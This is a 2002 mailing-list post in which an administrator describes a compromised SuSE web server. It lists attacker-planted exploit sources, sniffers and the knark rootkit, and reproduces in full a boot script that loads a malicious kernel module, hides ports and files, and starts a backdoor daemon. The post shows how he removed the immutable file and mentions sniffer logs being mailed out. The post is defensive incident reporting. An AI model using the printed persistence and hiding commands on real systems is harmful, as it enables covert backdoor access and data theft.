so, some news ... ok, i found it:
http://rr.sans.org/malicious/ramen3.php maybe you keep an eye of your system. it installed a backdoor on port 2000. it installed several things: /tmp/xp /tmp/l then: /tmp/.install/ -rw-r--r-- 1 www www 11084 Nov 22 21:04 abc.tgz drwxr-xr-x 2 www www 1024 Dec 29 18:15 sploitz/ dir: sploitz drwxr-xr-x 2 www www 1024 Dec 29 18:15 ./ d--------- 3 www www 1024 Dec 29 18:17 ../ -rwxr-xr-x 1 www www 14719 Dec 29 18:15 epc* -rw-r--r-- 1 www www 4877 May 5 2002 epcs2.c -rw-r--r-- 1 www www 1270 Feb 27 2002 modu.sh -rwxr-xr-x 1 www www 14940 Dec 29 18:14 ptr* -rw-r--r-- 1 www www 3947 Jun 27 2002 ptrace24.c -rwxr-xr-x 1 www www 27710 Dec 29 18:15 su* -rw-r--r-- 1 www www 11990 May 5 2002 su.c -rwxr-xr-x 1 www www 24101 Dec 29 18:15 sxp* -rw-r--r-- 1 www www 9774 Jun 27 2002 sxp.c /dev/raw/: drwxr-xr-x 2 root root 1024 Dec 29 18:17 .doz/ .doz: -rwxr-xr-x 1 root root 16294 Aug 17 2001 ryan* /dev/ida/.sys drwxr-xr-x 3 root root 1024 Dec 29 18:17 ./ drwxr-xr-x 5 root root 1024 Dec 29 20:48 ../ -rwxr-xr-x 1 root root 1250 Mar 30 2001 clean* -rwxr-xr-x 1 root root 11948 Mar 21 2001 hexa* drwxr-xr-x 3 root root 1024 Dec 29 18:17 knark/ -rwxr-xr-x 1 root root 15166 Apr 24 2001 knark.tgz* -rwxr-xr-x 1 root root 10068 Mar 5 2001 slice* -rwxr-xr-x 1 root root 605 Sep 9 2001 sniffchk* -rwxr-xr-x 1 root root 17990 Aug 17 2001 snuff* -rwxr-xr-x 1 root root 5387 Sep 9 2001 snuff.c* -rwxr-xr-x 1 root root 1990 Oct 5 2001 sysinfo* -rwxr-xr-x 1 root root 3984 Mar 5 2001 vadim* then: (we got suse linux) -rw-r--r-- 1 root root 28 Dec 29 18:17 /etc/rc.d/rc.sysinit with content: /usr/bin/ishit -t1 -X53 -p ------------------------ in this ishit file is: -------------- root@WebX(/usr/bin)> more ishit cd /dev/ida/.sys/knark/ > /dev/null 2> /dev/null /sbin/insmod -f /lib/modules/atapi.o > /dev/null 2> /dev/null ./nethide ":26BF" > /dev/null 2> /dev/null ./nethide ":23EF" > /dev/null 2> /dev/null ./nethide ":2B18" > /dev/null 2> /dev/null ./nethide ":1A0A" > /dev/null 2> /dev/null ./nethide ":1A0B" > /dev/null 2> /dev/null ./nethide ":1A0C" > /dev/null 2> /dev/null ./nethide ":1A0D" > /dev/null 2> /dev/null ./nethide ":1B58" > /dev/null 2> /dev/null ./nethide ":D5" > /dev/null 2> /dev/null ./nethide ":D9" > /dev/null 2> /dev/null ./nethide ":89" > /dev/null 2> /dev/null ./nethide ":47CB" > /dev/null 2> /dev/null ./nethide ":1A09" > /dev/null 2> /dev/null ./nethide ":1A08" > /dev/null 2> /dev/null ./nethide ":1A07" > /dev/null 2> /dev/null ./nethide ":1A06" > /dev/null 2> /dev/null ./nethide ":1A05" > /dev/null 2> /dev/null ./nethide ":1A04" > /dev/null 2> /dev/null ./nethide ":7DB4" > /dev/null 2> /dev/null ./nethide "7DB4" > /dev/null 2> /dev/null ./hidef /etc/ssh_host_key > /dev/null 2> /dev/null ./hidef /etc/sshd_config > /dev/null 2> /dev/null ./hidef /dev/ida/.sys > /dev/null 2> /dev/null ./hidef /usr/sbin/initd > /dev/null 2> /dev/null ./hidef /dev/raw/.doz > /dev/null 2> /dev/null ./hidef /usr/bin/ishit > /dev/null 2> /dev/null ./hidef /dev/ida/.sys/knark/ * > /dev/null 2> /dev/null cd .. /etc/rc.d/init.d/sshd restart > /dev/null 2> /dev/null /usr/sbin/initd -q -p 32180 > /dev/null 2> /dev/null # killall -31 initd > /dev/null 2> /dev/null # /dev/raw/.doz/ryan > /dev/null 2> /dev/null # killall -31 snuff > /dev/null 2> /dev/null # killall -31 ryan > /dev/null 2> /dev/null ---------------------- end of ishit file ---------------------- he installes an atapi driver: root@WebX(/lib/modules)> ll -t total 17 drwxr-xr-x 4 root root 1024 Dec 29 18:17 ./ -rw-r--r-- 1 root root 11796 Dec 29 18:17 atapi.o and creates an: root@WebX(/dev)> ll /usr/sbin/initd -rwxr-xr-x 1 root root 208264 Jan 2 2002 /usr/sbin/initd* very nice is: root@WebX(/usr/bin)> ll ishit -r-x------ 1 root root 2269 Dec 25 2001 ishit* you cannot delete the file: root@WebX(/usr/bin)> rm ishit rm: remove `ishit', overriding mode 0500? yes rm: ishit: Operation not permitted so: how to remove that file? it's im possible to overrite it, or to delete it... root@WebX(/usr/bin)> lsattr ishit ----i--- ishit root@WebX(/usr/bin)> chattr -i ishit root@WebX(/usr/bin)> rm ishit ------ i found a email address in a script, that mails a sniffer log to [EMAIL PROTECTED] and starts a new sniffer... so, i installed http://www.chkrootkit.org/ and checked out: 3 machines have stuff installed and so on.. so, i have a great time now... in installing new machines... bye :( steven > -----Urspr�ngliche Nachricht----- > Von: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]Im > Auftrag von Steven Glogger > Gesendet: Sonntag, 29. Dezember 2002 19:48 > An: [EMAIL PROTECTED] > Betreff: [swinog] hack > > > hi everybody > > someone tryed to hack our webserver. > he uploaded a file called 'l' or 'xp' which has a size of: 11947 > > does anyone knows what this could be? > > greetings > > steven > ---------------------------------------------- > [EMAIL PROTECTED] Maillist-Archive: > http://www.mail-archive.com/swinog%40swinog.ch/ > ---------------------------------------------- [EMAIL PROTECTED] Maillist-Archive: http://www.mail-archive.com/swinog%40swinog.ch/
